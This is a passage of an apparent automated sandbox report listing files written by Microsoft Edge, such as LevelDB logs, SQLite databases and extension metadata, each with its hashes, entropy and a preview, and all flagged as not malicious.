                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147951974437275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCdGHlL+q2Pwkn23oH+Tcwt8aPrqIFUtfCdc+T1Zmw5Cdc+FLVkwOwkn23oH+o:7VdIvYfYebL3FUtfi1/505JfYebQJ
                                                                                                                                                                                                                                                                                  MD5:D114D65ABF0A335BFC35DDA4787D3953
                                                                                                                                                                                                                                                                                  SHA1:0E904A95FCDB0B6ACD3F91143BFC8F480BEE72E4
                                                                                                                                                                                                                                                                                  SHA-256:EBF87A7A4D6BC6B3620894B6AF83EAF8831BECDA08E5627A1C684393DBFAD0AA
                                                                                                                                                                                                                                                                                  SHA-512:CCFE8363AE786FC8386B0592F37732398F0F85F6236DDA1955588EFD84E7E4A52B938C8D1E72288C17ED845A7E8C257A55169DCA08B70E25934F4CA914AD293A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:20.810 19a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/03-17:33:20.811 19a8 Recovering log #3.2025/01/03-17:33:20.811 19a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147951974437275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCdGHlL+q2Pwkn23oH+Tcwt8aPrqIFUtfCdc+T1Zmw5Cdc+FLVkwOwkn23oH+o:7VdIvYfYebL3FUtfi1/505JfYebQJ
                                                                                                                                                                                                                                                                                  MD5:D114D65ABF0A335BFC35DDA4787D3953
                                                                                                                                                                                                                                                                                  SHA1:0E904A95FCDB0B6ACD3F91143BFC8F480BEE72E4
                                                                                                                                                                                                                                                                                  SHA-256:EBF87A7A4D6BC6B3620894B6AF83EAF8831BECDA08E5627A1C684393DBFAD0AA
                                                                                                                                                                                                                                                                                  SHA-512:CCFE8363AE786FC8386B0592F37732398F0F85F6236DDA1955588EFD84E7E4A52B938C8D1E72288C17ED845A7E8C257A55169DCA08B70E25934F4CA914AD293A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:20.810 19a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/03-17:33:20.811 19a8 Recovering log #3.2025/01/03-17:33:20.811 19a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.164074907850377
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCdCFgL+q2Pwkn23oH+Tcwt865IFUtfCdCF21Zmw5CdCFgLVkwOwkn23oH+Tc4:7VXFFvYfYeb/WFUtfXF21/5XFY5JfYev
                                                                                                                                                                                                                                                                                  MD5:D4CC039856BBBEE6CD2DBB7B6CAB591C
                                                                                                                                                                                                                                                                                  SHA1:FBC517DAEDC5360906183120BBB4CD4D67D1D19C
                                                                                                                                                                                                                                                                                  SHA-256:39DCE36E435912FB847DC1B0D7ADC198DDEF67564A69C5C285CFBD777ABD42C5
                                                                                                                                                                                                                                                                                  SHA-512:D07DDF4293376CAD68565F4150BC4668E329F3AEAA03E1B7A3AA6941BF1C4AA5F1CD4DE416605F3E340EEB8835DB5015277AE9D385D500A9F45D255A62D7DAA4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:20.813 19a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/03-17:33:20.813 19a8 Recovering log #3.2025/01/03-17:33:20.813 19a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.164074907850377
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCdCFgL+q2Pwkn23oH+Tcwt865IFUtfCdCF21Zmw5CdCFgLVkwOwkn23oH+Tc4:7VXFFvYfYeb/WFUtfXF21/5XFY5JfYev
                                                                                                                                                                                                                                                                                  MD5:D4CC039856BBBEE6CD2DBB7B6CAB591C
                                                                                                                                                                                                                                                                                  SHA1:FBC517DAEDC5360906183120BBB4CD4D67D1D19C
                                                                                                                                                                                                                                                                                  SHA-256:39DCE36E435912FB847DC1B0D7ADC198DDEF67564A69C5C285CFBD777ABD42C5
                                                                                                                                                                                                                                                                                  SHA-512:D07DDF4293376CAD68565F4150BC4668E329F3AEAA03E1B7A3AA6941BF1C4AA5F1CD4DE416605F3E340EEB8835DB5015277AE9D385D500A9F45D255A62D7DAA4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:20.813 19a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/03-17:33:20.813 19a8 Recovering log #3.2025/01/03-17:33:20.813 19a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1197
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                                  MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                                                                                                                                  SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                                                                                                                                  SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                                                                                                                                  SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.107740816824587
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCULmlyq2Pwkn23oH+Tcwt8NIFUtfCH/1Zmw5CHpRkwOwkn23oH+Tcwt8+eLJ:7VcyvYfYebpFUtfi/5qR5JfYebqJ
                                                                                                                                                                                                                                                                                  MD5:1D8973D3F21970ED20E46A3947140894
                                                                                                                                                                                                                                                                                  SHA1:36808B6EFD4DED1B0C2D17284723655D6B7E7780
                                                                                                                                                                                                                                                                                  SHA-256:ACBBE99C3265B91D88C52598B671A2D1A6CF923736889527BC4A68664D8BC129
                                                                                                                                                                                                                                                                                  SHA-512:1F6DDFA2EB982CADD60D7CD62AB60394343C2D5A7F4FF614EF3FD29E6C3330CE4A85137D9DE93E97A9FB8C1904EBCBB2CB716485AD9299ABEF699D1065BB8669
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.029 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/03-17:33:01.030 1a74 Recovering log #3.2025/01/03-17:33:01.030 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.107740816824587
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCULmlyq2Pwkn23oH+Tcwt8NIFUtfCH/1Zmw5CHpRkwOwkn23oH+Tcwt8+eLJ:7VcyvYfYebpFUtfi/5qR5JfYebqJ
                                                                                                                                                                                                                                                                                  MD5:1D8973D3F21970ED20E46A3947140894
                                                                                                                                                                                                                                                                                  SHA1:36808B6EFD4DED1B0C2D17284723655D6B7E7780
                                                                                                                                                                                                                                                                                  SHA-256:ACBBE99C3265B91D88C52598B671A2D1A6CF923736889527BC4A68664D8BC129
                                                                                                                                                                                                                                                                                  SHA-512:1F6DDFA2EB982CADD60D7CD62AB60394343C2D5A7F4FF614EF3FD29E6C3330CE4A85137D9DE93E97A9FB8C1904EBCBB2CB716485AD9299ABEF699D1065BB8669
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.029 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/03-17:33:01.030 1a74 Recovering log #3.2025/01/03-17:33:01.030 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.107740816824587
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCULmlyq2Pwkn23oH+Tcwt8NIFUtfCH/1Zmw5CHpRkwOwkn23oH+Tcwt8+eLJ:7VcyvYfYebpFUtfi/5qR5JfYebqJ
                                                                                                                                                                                                                                                                                  MD5:1D8973D3F21970ED20E46A3947140894
                                                                                                                                                                                                                                                                                  SHA1:36808B6EFD4DED1B0C2D17284723655D6B7E7780
                                                                                                                                                                                                                                                                                  SHA-256:ACBBE99C3265B91D88C52598B671A2D1A6CF923736889527BC4A68664D8BC129
                                                                                                                                                                                                                                                                                  SHA-512:1F6DDFA2EB982CADD60D7CD62AB60394343C2D5A7F4FF614EF3FD29E6C3330CE4A85137D9DE93E97A9FB8C1904EBCBB2CB716485AD9299ABEF699D1065BB8669
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.029 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/03-17:33:01.030 1a74 Recovering log #3.2025/01/03-17:33:01.030 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3169096321222068
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                                                                                                                                  MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                                                                                                                                  SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                                                                                                                                  SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                                                                                                                                  SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.40981274649195937
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                                                                                                                                  MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                                                                                                                                  SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                                                                                                                                  SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                                                                                                                                  SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, 1st free page 10, free pages 1, cookie 0x48, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5409541235068317
                                                                                                                                                                                                                                                                                  Encrypted:false
